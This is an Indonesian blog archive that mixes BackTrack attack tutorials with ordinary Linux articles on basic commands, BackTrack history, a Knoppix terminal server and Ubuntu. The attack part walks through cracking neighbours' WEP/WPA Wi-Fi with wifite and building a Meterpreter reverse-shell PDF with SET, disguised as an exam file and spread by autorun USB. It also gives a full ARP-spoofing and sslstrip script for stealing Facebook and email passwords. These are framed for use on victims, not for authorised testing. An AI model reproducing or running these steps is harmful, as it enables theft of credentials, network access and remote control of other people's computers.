Kamis, 20 Maret 2014

Cara membobol sinyal Wi - Fi (wep-wpa)


Setelah sukses dengan interface (antar muka) media pencari reaver, kini banyak para hacker`s meretakan sandi pasword apasaja, salah satu`y yg paling banyak di minati oleh para gratisan seperti saya sendiri suka yang gratisan,,, hehehe!!! 
Ok setelah reaver sukses di bangun,,, kini pecinta hacker membangun cara menggunakan back|track dengan lebih baik lagi,,, mudah simpel dan sangat gampang untuk di pelajari, dengan menggunakan back|track interface (antar muka) atau media pencari wifite.
Sejak dari pertama di orbitkan, ternyata wifite di sebut sebagai ancaman terbesar buat pengguna wifi!
tujuan untuk menyerang WEP WPA dan jaringan berentesi WPS.
Morse wifity:
- untuk memecahkan semua jalur akses WEP:
- untuk memecahkan semua akses poin WPS dengan kekuatan sinyal lebih besar dari 50dB:
- untuk menyerang semua jalur akses, darkc0de.lst' untuk retak handshake WPA:
- untuk memecahkan semua jalur akses WEP lebih besar dari kekuatan 50dB, batas waktu 5-10 menit untuk setiap memecahkan WEP, dan kecepatan mengirim paket dat sebanyak  600 paket / detik:
dan masih banyal lg fitur morse yg lain,

interface: wifite v1
              wifite v 2

Langsung saja: Terlebih dahulu untuk meretakan WEP
 saya mencoba menggunakan inferface wifite v2 untuk meretakan WEP
Langkah pertama login ke dalam back|track.
1 : Ampplications-back track-Explotation tool-Wireless Explotation tool-WLAN Exploitation-wifite
2 : Setelah terbuka kedalam cmd (terminal) tulis
./wifite.py -wep (untuk membuka WEP)
3 : Setelah ok (enter) akan nampak seperti gambar di bawah
4 : Setelah itu akan keluar nama sinyal sebagai target
lalu dir ( ctrl+c) pada keyboard
dan lihat no dari nama target sinyal yg akan di retakan (jebol)
contoh: saya memilih no 1 nama 983bdstc untuk memulai`y tullis angka 1 setalah all`:
 5 : Setelah ok (enter) biarkan dan tunggu hingga  pasword berhasil di pecahkan,
lihat tempo waktu [0:10:00] hitung mundur inti`y wep bisa di pecahkan -+ dalam waktu 10 menit.
dan wep attacks succeeded
Hebat`y interface ini, bisa menjebol sinyal yg paling sulit sekalipun mulai dari angka,hurup,campuran dr 5 atau 20 karakter pasword  sangat berbeda dengan metode inferface yg lain atau yg sebelum`y,
WPA, sekarang bagaimana cara meretakan sinyal WPA, 
 Sebetul`y langkah untuk WEP dan WPA tidaklah jauh berbeda,
Langkah pertama login ke dalam back|track.
1 : Ampplications-back track-Explotation tool-Wireless Explotation tool-WLAN Exploitation-wifite

2 : Setelah terbuka kedalam cmd (terminal) tulis
./wifite.py -wps (untuk membuka WPA)
3 : Setelah ok (enter) akan nampak seperti gambar di bawah
4 : Setelah itu akan keluar nama sinyal sebagai target
lalu dir ( ctrl+c) pada keyboard
dan lihat no dari nama target sinyal yg akan di retakan (jebol)
contoh: no 3 nama Afaqshamel, untuk memulai`y tullis angka 3 setalah all`:

5 : Setelah ok (enter) biarkan dan tunggu hingga  pasword berhasil di pecahkan,
lihat tempo waktu di mulai dari [0:00:00] hingga pinis, inti`y waktu pemecahan pasword tidak terbatas,
bisa 1-20 jam , tergantung dr kesulitan acak karakter pasword, sabar dan tunggu saja hasil`y,

 Sebetul`y masih banyak kehebatan dari interface ini, bisa sekali login dan membuka nama sinyal sampai 5 sinyal, dan langkah hampir sama, nanti lg kita bahas,,,,,, ok!!!
Ada lagi cara membuka sinyal WPA/WEP, dengan langkah lain,
cara`y ini juga sangat mudah, lihat di tutorial yg saya buat:


Untuk sobat yg menggunakan back|track 5 versi berapa saja silahkan cek file wifite.py
seperti gambar di bawah
kalau belum punya silahkan download DISINI  pasword simonteltea
 
Credit By : andysador.blogspot.com

Hacking Windows Dengan BackTrack SET & USB


Tools yang digunakan : SET (Social Engineering Toolkit)
O.S yang digunakan : Backtrack 5
Victim O.S : Windows XP SP3 (fungsi autorun = on)
Hacking Windows Dengan BackTrack SET & USB
Seperti yang kita ketahui bahwa akhir-akhir ini USB benar-benar amat sangat populer penggunaannya di semua kalangan masyarakat…
Ketika saya masih nge-kost, kadang saya mendengar tetangga sebelah saya bilang sama tetangga sebelahnya lagi “Eh, gue copy dong lagu yang kemaren itu…nih USB nya, ntar kalo udah beres copy lo kasih tau gue aja ya“.
Sebenarnya apakah mungkin melakukan serangan terhadap komputer lainnya hanya dengan menggunakan USB?? jawabannya kita lihat langkah-langkah berikut dibawah ini :
Persiapan :
1. SET
2. O.S(saya pake backtrack 5 yang udah include di dalemnya semua toolsnya)

Keterangan :

Tulisan Berwarna Merah = command line
Langkah-langkahnya :
1. Buka console backtrack (CTRL+ALT+T) lalu masuk ke folder /pentest/exploits/set.
cd /pentest/exploits/set
2. Jalankan Social Engineering Toolkit dengan perintah ./set.





3. Pilih Nomor 3 “Infectious File Generator” lalu pilih nomor 1 “File Format Exploit“, dan selanjutnya masukkan IP address penyerang(komputer kita)

4. Pilih format exploit yang hendak digunakan…disini saya gunakan menggunakan “Adobe PDF Embedded EXE social engineering“.
5. Langkah berikutnya yaitu memilih file PDF yang akan digunakan untuk menyerang.

Kalau kawan-kawan punya file PDF sendiri, itu jauh lebih bagus soalnya begitu si korban buka dia ngga terlalu curiga, jadi disini kita pilih nomor 1.
6. Langkah berikutnya adalah memilih payload atau apa yang ingin kita dapat dari korban jika ia meng-klik exploit yang kita buat. Disini saya memilih nomor 2 “Windows Meterpreter Reverse_TCP shell
7. Berikutnya adalah melakukan setting connect back, maksudnya adalah ketika exploit berhasil dijalankan, pada port berapakah kita akan menangkap koneksi tersebut? disini saya gunakan port 80(kenapa harus port 80? nanti lihat di sumber aja ya)

8. Ketika muncul pertanyaan “Do you want to create a listener right now? [yes|no]” pilih YES.
9. Semua file yang berhasil di-generate oleh SET tersimpan pada folder /pentest/exploits/set/autorun, tetapi nama file tersebut agak mencurigakan & kurang menarik sehingga lebih baik jika kita rubah terlebih dahulu penamaan file tersebut.
masuk ke folder autorun :
cd /pentest/exploits/set/autorun
10. Lakukan perintah ini
pico autorun.inf
11. Didalam file autorun.inf, rubah template.pdf menjadi nama file yang menarik agar korban mau membuka file tersebut. Berikut adalah isi autorun.inf yang saya buat :
[autorun]
open=Soal_UAS_2011_Aljabar.pdf
icon=autorun.ico

Lalu tekan CTRL + O untuk melakukan SAVE dan CTRL + X untuk keluar.
12. Langkah selanjutnya adalah menamai template.pdf menjadi nama yang telah kita definisikan pada autorun.inf dengan perintah mv.
mv template.pdf Soal_UAS_2011_Aljabar.pdf
13. Selesai sudah, selanjutnya tinggal meng-copy kan semua file yang ada dalam folder autorun tersebut ke dalam USB anda.
14. Ketika victim mencolokkan USB dan autorun komputernya dalam keadaan aktif, maka ia akan otomatis membuka file PDF yang tadi telah kita buat.
15. Ketika ia meng-klik OK untuk setiap alert yang muncul, maka :

Sukses!
FAQ :
Q : Lalu bagaimana kalau ternyata autorun komputer victim dalam keadaan dimatikan??
A : Sifat manusia itu biasanya ingin tahu & penasaran, pasti segala cara akan ia lakukan agar PDF tersebut terbuka apalagi setelah tahu bahwa Title PDF nya memang penting & menarik untuknya.
Penanggulangan :
1. Ketika muncul suatu alert atau hal-hal yang tidak wajar saat membuka suatu file dengan ekstensi tertentu, lebih baik batalkan/cancel saja jangan diteruskan.
2. Matikan autorun / autoplay

Credit By : backtrackermania.blogspot.com

Cara hack password facebook dan email dengan script menggunakan sniffing


1.Pertama-tama kita copas script dibawah dan buat menjadi executable



Spoiler! :

#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
.__ _____ _____ .__
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $INT &


script diatas bukan ane yang buat bro, ane dapat dr forum backtrack.org

2. kalo udah dicopas save as dengan nama bebas terserah mamen, kalo ane sih kasih nama file nya "sniff" dan pastikan buat menjadi executeble

3. selanjutnya execute script tadi dengan command
# ./sniff.sh

4. kalo berhasil akan keluar pertanyaan seperti dibawah ini:

5. Tunggu dengan sabar karena kita ga tahu kapan korban akan login ke account FB, Gmail, yahoo dkk. setelah menunggu dengan sabar akhirnya datang eh salah nongol juga tuh password di ettercap

Begitulah cara menggunakan Sniffing.

Credit By : backtrackermania.blogspot.com

Perintah perintah dasar backtrack


Contoh perintah perintah  dasar pada backtrack...

[*] Login
Username root password toor > default user pada backtrack, saran ane setelah login langsung ganti password dengan command
root@bt:~# passwd
kemudian masukkan password baru


[*] Memperbaiki tampilan splash:
root@bt:~# fix-splash

[*] Memulai X-server (Desktop GUI)
root@bt:~# startx

[*] networking
untuk memulai networking biasanya menggunakan WICD tpi sebelumnya ketik dulu di console:
root@bt:~# /etc/init.d/wicd start
lalu klik :
menu > internet > wicd netwok manager

setting ip dynamic,
root@bt:~# dhclient <interface network ente>
-- interface disini bisa saja eth0 atau eth1

Setting IP static
misalnya :
interface - eth0
IP Address - 192.168.1.9/24
Default Gateway - 192.168.1.1
DNS server - 192.168.1.1
maka perintah yang digunakan adalah :

root@bt:~# ifconfig eth0 192.168.1.9/24
root@bt:~# route add default gw 192.168.1.1
root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

settingan ini akan kembali default bila di reboot, untuk menjadikan permanen maka kita perlu meng-edit file /etc/network/interfaces,

root@bt:~# nano /etc/network/interfaces

auto eth0
iface eth0 inet static
address 192.168.1.9
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

kemudian save dengan menggunakan perintah CTRL+X kemudian jawab y kemudian enter

root@bt:~# update-rc.d networking defaults
root@bt:~# /etc/init.d/networking restart

[*] Memulai service di BT :

  • SSH (Secure Shell)
    sebelum menjalankan service ssh unutk pertama kali, kita perlu meng-generate key nya jalankan perintah:
    root@bt:~# sshd-generate
    root@bt:~# /etc/init.d/ssh start
    Starting OpenBSD Secure Shell server: sshd.

    untuk menghentikan service :
    root@bt:~# /etc/init.d/ssh stop
    Stopping OpenBSD Secure Shell server: sshd.
  • apache webserver
    root@bt:~# /etc/init.d/apache2 start
    atau bisa jg dengan perintah

    root@bt:~# service apache2 start
    * Starting web server apache2

    atau :
    root@bt:~# apache2ctl start

    untuk menghentikan service :

    root@bt:~# /etc/init.d/apache2 stop

    atau :
    root@bt:~# service apache2 stop

    atau :
    root@bt:~# apache2ctl stop
  • MySQL
    untuk memulai bisa menggunakan perintah :
    root@bt:~# /etc/init.d/mysql start

    atau:
    root@bt:~# start mysql

    untuk menghentikan :
    root@bt:~# /etc/init.d/mysql stop

    atau :
    root@bt:~# stop mysql

Backtrack


Sejarah
Backtrack dibuat oleh Mati Aharoni yang merupakan konsultan sekuriti dari Israel. Jadi merupakan kolaborasi komunitas. Backtrack sendiri merupakan merger dari whax yang merupakan salah satu distro Linux yang digunakan untuk tes keamanan yang asal dari whax sendiri dar Knoppix. Ketika Knoppix mencapi versi 3.0 maka dinamakan dengan whax. Whax dapat digunakan untuk melakukan tes sekuriti dari berbagai jaringan di mana saja. Max Mosser merupakan auditor security collection yang mengkhususkan dirinya untuk melakukan penetrasi keamanan di Linux. Gabungan dari auditor dan Whax ini sendiri menghasilkan 300 tool yang digunakan untuk testing security jaringan. Auditor security collection juga terdapat pada knoppix.
Namun, sejak rilis ke-4 hingga rilis yang terbaru ini, BackTrack sudah tidak lagi menggunakan basis Knoppix. BackTrack kini menggunakan basis Ubuntu.
BackTrack telah memasuki versi 5 R2 dengan kernel 3.2.6
Tools
BackTrack menyediakan akses mudah untuk tools komprehensif yang berhubungan dengan keamanan, mulai dari Port Scanner sampai Password Scanner. Dukungan fungsi Live CD dan Live USB mengijinkan pengguna untuk me-boot BackTrack secara langsung dari media penyimpan portabel tanpa harus melakukan penginstallan pada Hardisk secara permanen.
BackTrack berisi banyak tools keamanan yang terkenal yaitu:
  • Metasploit Iintegration (Non-Working and Officially Unsupported)
  • RFMON Injection capable wireless drivers
  • Airmon-NG
  • Kismet
  • Nmap
  • Ophcrack
  • Ettercap
  • Wireshark (formerly known as Ethereal)
  • BeFF (Browser Exploitation Framework)
  • Hydra
  • OWASP Mantra Security Framework collection of hacking tools, add-ons and scripts based on Firefox
  • Cisco OCS Mass Scanner A very reliable and fast scanner for Cisco routers with telnet/enable default password.
  • Quypt (Terminal Emulator) (software pribadi oleh Crimson Hacking group, yang telah dimasukan ke bagian utama) Blackhat
  • Banyak kumpulan exploits serta software yang lebih umum seperti browsers.
BackTrack membagi tools menjadi 12 kategori:
  • Information Gathering
  • Vulnerability Assessment
  • Exploitation Tools
  • Privilege Escalation
  • Maintaining Access
  • Reverse Engineering
  • RFID Tools
  • Stress testing
  • Forensics
  • Reporting Tools
  • Services
  • Miscellaneous
Tanggal Rilis
Tanggal
Rilis
5 Februari 2006
BackTrack v.1.0 Beta
26 Mei 2006
Proyek BackTrack dirilis pertama kali versi non-beta (1.0).
6 Maret 2007
BackTrack 2 final released.
19 Juni 2008
BackTrack 3 final released.
9 januari 2010
BackTrack 4 final release. (Now based on Ubuntu)
8 Mei 2010
BackTrack 4 R1 release
22 November 2010
BackTrack 4 R2 release
10 Mei 2011
BackTrack 5 release (Based on Ubuntu 10.04 LTS, Linux kernel 2.6.38 )
18 Agustus 2011
BackTrack 5 R1 release (Based on Ubuntu 10.04 LTS, Linux kernel 2.6.39.4)
1 Maret 2011
BackTrack 5 R2 release (Linux kernel 3.2.6)

Rabu, 19 Maret 2014

Cara menginstall linux Knoppix


LINUX KNOPPIX
Thin Client / Diskless adalah sebuah komputer yang tidak dilengkapi dengan media penyimpanan (storage) antara lain : Harddisk, CDROM. Namun komputer tersebut bisa melakukan booting dan memiliki sistem operasi sehingga komputer tersebut bisa digunakan untuk kegiatan sehari-hari. Hal tersebut bisa dilakukan hanya dengan menggunakan NIC (network interface card) dan komputer yang terhubung dalam jaringan.

Penggunaan thin client/diskless di sistem operasi linux biasanya menggunakan LTSP (Linux Terminal Server Project). Namun, kali ini kita akan mencoba fasilitas yang ada didalam Linux KNOPPIX yaitu KNOPPIX Terminal Server.

Dalam menggunakan KNOPPIX Terminal Server kita punya beberapa cara, diantaranya :

1. Linux KNOPPIX diaktifkan dari CD-ROM (tanpa di install).
2. Linux KNOPPIX di-copy ke harddisk (booting dari disket).
3. Linux KNOPPIX di-install ke harddisk

Konfigurasi KNOPPIX Terminal Server melalui CD-ROM dan harddisk

Untuk tipe konfigurasi ini kita tidak perlu menginstall Linux Knoppix ke dalam harddisk. Kita cukup melakukan booting melalui cd-rom seperti layaknya kita akan menjalankan Linux Knoppix. Setelah proses boot selesai langkah selanjutnya adalah :

* Konfigurasi network address komputer yang kita gunakan sebagai server. Untuk proses ini kita bisa menggunakan perintah netcardconfig atau memilih KNOPPIX->Network/Internet->Network card configuration dari menu knoppix. Namun, bila ingin sedikit ‘macho’ anda bisa mengetikan perintah ifconfig dari shell.

* (sesuaikan dengan konfigurasi jaringan di lingkungan anda).
Use DHCP Broadcast : No
IP Address : 10.10.11.119
Network Mask : 255.255.255.0
Broadcast Address : 10.10.11.255
Default gateway : 10.10.11.3
Name Server : 10.10.1.6

* Setelah konfigurasi network address selesai, selanjutnya anda tinggal menggunakan perintah knoppix-terminalserver untuk mengkonfigurasi Knoppix Terminal Server.

setup (Re)configure server and (re)start
available network device : eth0
- (nic yang ingin digunakan untuk Knoppix terminal server)
IP range of addresses : 10.10.11.201 10.10.11.250
- (disesuaikan dengan jumlah client)
Network modules : SIS900.o
- (pilih sesuai dengan NIC pada client)
Performance & Security : secure, masq, dns
- (tambahkan webproxy apabila memiliki RAM diatas 256MB)
Start server : Yes

Agar kita tidak lagi menggunakan cdrom dalam menggunakan Linux Knoppix karena kita ingin menggunakan cdrom drive kita untuk membuka file dari CD, maka kita dapat meng-copy seluruh isi cd Linux Knoppix ke dalam harddisk (partisi FAT, FAT32, NTFS). Setelah itu kita harus membuat bootfloppy (KNOPPIX -> utilities -> create bootfloppies for KNOPPIX) untuk bisa boot kedalam Linux Knoppix yang sudah ter-copy di dalam harddisk. Untuk bootfloppy dibutuhkan 2 disket.

Instalasi Linux KNOPPIX ke harddisk dan konfigurasi KNOPPIX Terminal Server.

Diatas kita telah mengetahui bagaimana cara untuk melakukan konfigurasi Knoppix terminal server tanpa menginstall Linux Knoppix kedalam harddisk. Sekarang, kita akan mencoba mengkonfigurasi Knoppix Terminal Server dengan kondisi Linux Knoppix sudah terinstall kedalam harddisk.

Untuk menginstall Knoppix ke dalam harddisk kita bisa menggunakan perintah knx2hd (untuk knoppix 3.3 keatas) atau knx-hdinstall (untuk knoppix 3.2 kebawah) kemudian ikuti langkah-langkah yang ada dilayar. Setelah selesai proses instalasinya, cobalah untuk melakukan booting melalui harddisk yang sudah terinstall Linux Knoppix.

Langkah selanjutnya untuk melakukan konfigurasi KNOPPIX Terminal Server adalah sebagai berikut :

1. booting dari CD Knoppix dengan option boot “knoppix 2”
2. kemudian copy file-file KNOPPIX ke dalam directory NFS :
3. cp -Rp /KNOPPIX/* /mnt/hda1/cdrom
- (Jika Linux Knoppix ter-install di hda1)
4. kemudian reboot tanpa CD Knoppix
5. edit /usr/share/knoppix-terminalserver/templates/miniroot/linuxrc
- dari baris ke 242 – 252 adalah sebagai berikut :
# if we have an NFSDIR, try mounting it
if [ -n “$NFSDIR” ]; then
echo -n “${CRE}${BLUE}Trying to mount CD on” \
“${MAGENTA}$NFSDIR${BLUE}…${NORMAL}”
/static/mount -t nfs -o \
ro,rsize=8192,wsize=8192,hard,intr$SECUREOPTIONS \
“${NFSDIR}” /cdrom > /dev/null 2>&1 && MOUNTED=”yes”
# unsuccessful? Blank out NFSDIR and see if pump does better
[ -z “$MOUNTED” ] && echo “${RED}Failed.${NORMAL}” && NFSDIR=
fi

dirubah menjadi seperti berikut :

# if we have an NFSDIR, try mounting it
if [ -n “$NFSDIR” ]; then
echo -n “${CRE}${BLUE}Trying to mount CD on” \
“${MAGENTA}$NFSDIR${BLUE}…${NORMAL}”
/static/mount -t nfs -o \
ro,rsize=8192,wsize=8192,hard,intr$SECUREOPTIONS \
“${NFSDIR}” /KNOPPIX > /dev/null 2>&1 && MOUNTED=”yes”
# unsuccessful? Blank out NFSDIR and see if pump does better
[ -z “$MOUNTED” ] && echo “${RED}Failed.${NORMAL}” && NFSDIR=
fi

- dari baris ke 304 – 321 adalah sebagai berikut :
FOUND_KNOPPIX=”"
if test -f /cdrom/KNOPPIX/KNOPPIX
then
echo -n “${CRE} ${GREEN}Accessing KNOPPIX CDROM image at ${MAGENTA}$NFSDIR${GREEN}…${NORMAL}”
FOUND_KNOPPIX=”true”
else
dropshell
fi
# Harddisk-installed script part version has been removed
# (KNOPPIX can be booted directly from HD now).
# DEBUG
# echo “6″ > /proc/sys/kernel/printk
$INSMOD /modules/cloop.*o file=/cdrom/KNOPPIX/KNOPPIX
mountit /dev/cloop /KNOPPIX “-o ro$SECUREOPTIONS” || FOUND_KNOPPIX=”"

dirubah menjadi seperti berikut :

FOUND_KNOPPIX=”"
#if test -f /cdrom/KNOPPIX/KNOPPIX
#then
echo -n “${CRE} ${GREEN}Accessing KNOPPIX CDROM image at ${MAGENTA}$NFSDIR${GREEN}…${NORMAL}”
FOUND_KNOPPIX=”true”
#else
#dropshell
#fi
# Harddisk-installed script part version has been removed
# (KNOPPIX can be booted directly from HD now).
# DEBUG
# echo “6″ > /proc/sys/kernel/printk
#$INSMOD /modules/cloop.*o file=/cdrom/KNOPPIX/KNOPPIX
#mountit /dev/cloop /KNOPPIX “-o ro$SECUREOPTIONS” || FOUND_KNOPPIX=”"

6. jalankan knoppix-terminalserver
7. kemudian, lakukan boot pada client

Credit By :  instalasi-linux.blogspot.com

Ubuntu

Pengertian Sistem Operasi Linux Ubuntu

Pada pembahasan artikel saat ini yaitu membahas sistem operasi Linux Ubuntu,,,


Pengertian Ubuntu Linux

software sistem operasi open source yang gratis untuk disebarluaskan di bawah lisensi GNU. jadi anda diijinkan untuk menginstal pada komputer anda ataupun mengkopi dan menyebarluaskannya tanpa harus membayar. linux merupakan turunan dari unix dan dapat bekerja pada berbagai macam perangkat keras koputer mulai dari inter x86 sampai dengan RISC. Dengan lisensi GNU (Gnu Not Unix) Anda dapat memperoleh program, lengkap dengan kode sumbernya (source code). Tidak hanya itu, Anda diberikan hak untuk mengkopi sebanyak Anda mau, atau bahkan mengubah kode sumbernya.Dan itu semua legal dibawah lisensi. Meskipun gratis, lisensi GNU memperbolehkan pihak yang ingin menarik biaya untuk penggandaan maupun pengiriman program.
Asal mula nama Ubuntu berasal dari filosofi dari Afrika Selatan yang berarti "Kemanusiaan kepada sesama". Ubuntu didesain untuk kepentingan penggunaan personal, namun versi server Ubuntu juga tersedia, dan telah dipakai secara luas.
Proyek Ubuntu resmi disponspori oleh Canonical Ltd. yang merupakan sebuah perusahaan yang dimiliki oleh pengusaha Afrika Selatan Mark Shuttleworth. Tujuan dari distribusi Linux Ubuntu adalah membawa semangat yang terkandung di dalam Filosofi Ubuntu ke dalam dunia perangkat lunak. Ubuntu adalah sistem operasi lengkap berbasis Linux, tersedia secara bebas dan mempunyai dukungan baik yang berasal dari komunitas maupun tenaga ahli profesional.

Ubuntu terdiri dari banyak paket, kebanyakan berasal dari distribusi di bawah lisensi lisensi software bebas. Namun, beberapa software khususnya driver menggunakan Proprietary software. Lisensi yang pada umumnya adalah GNU General Public License (GNU GPL) dan GNU Lesser General Public License (GNU LGPL), dengan tegas menyatakan bahwa pengguna dengan bebas dapat menjalankan, menggandakan, mempelajarai, memodifikasi, dan mendistribusikan tanpa pembatasan apapun. Namun tetap ada software proprietary yang dapat berjalan di Ubuntu. Ubuntu berfokus pada ketersediaan kegunaan pada orang disfungsi, keamanan dan stabilitas.
Ubuntu juga berfokus pada internasionalosasi dan aksesibilitas untuk dapat menjangkau sebanyak-banyaknya orang. Dalam hal keamanan, perangkat sudo dapat meningkatkan privilage secara sementara untuk melakukan tugas administratif, sehingga akun root dapat terus terkunci, dan mencegah orang tidak terauthorisasi melakukan perubahan sistem atau membuka kelemahan keamanan.

Kelebihan Ubuntu
  1. bebas virus ; untuk saat ini virus lebih senang menyerang OS dari MS yg ber ext .exe untuk ubuntu sudah beda jadi virus dari os tetangga tidak akan berjalan di os linux.
  2. 3D Interface : efeck 3D kita sering jumpai di OS tetannga seperti aero memerlukan spek komputer yg tinggi tetapi ubuntu dengan spek komputer yg tidak terlalu tinggi sudah bisa 3D
  3. Kompatibilas : Ubuntu kompatibel dengan hampir semua perangkat keras terbaru, dari mulai usb modem, wifi dan perangkat lain just plug n play
  4. Kemudahan Migrasi
  5. free alias gratis : tinggal download dari situs ubuntu dapat download.
  6. user friendly : untuk orang awam sekalipun bisa memakai ubuntu.
Kekurangan Ubuntu

  1. Koneksi Internet : untuk update dan install ubuntu memerlukan koneksi internet sedangkan di indonesia tau sendiri internet mahal
  2. Terbatasnya pengetahuan tentang linux baik dari formal atau non formal karena indonesia kurikulum pendidikan masih lebih banyak OS dari MS, biasanya kita belajar dari internet atau dari forum untuk mengetahui apa sih linux itu
Fitur yang digunakan pada ubuntu

  1. untuk multimedia kita bisa mainkan mp3 dengan Rythmbox Music Player, memainkan dvd film di movie player , pitivi editor untuk mengedit film
  2. untuk jejaring sosial bisa memakain im messeger seperti ym, msn, jabber, gtalk dengan pidgin dan emphaty , untuk j ejaring sosial seperti facebook. tweeter dll dengan Gwibber microblogging.
  3. email dengan evolution, thunderbird
  4. browser dengan firefox, opera
  5. untuk efect 3d bisa menggunakan compiz dan emerald.
  6. untuk wifi sudah dilengkapi
Credit By : novia4ever.blogspot.com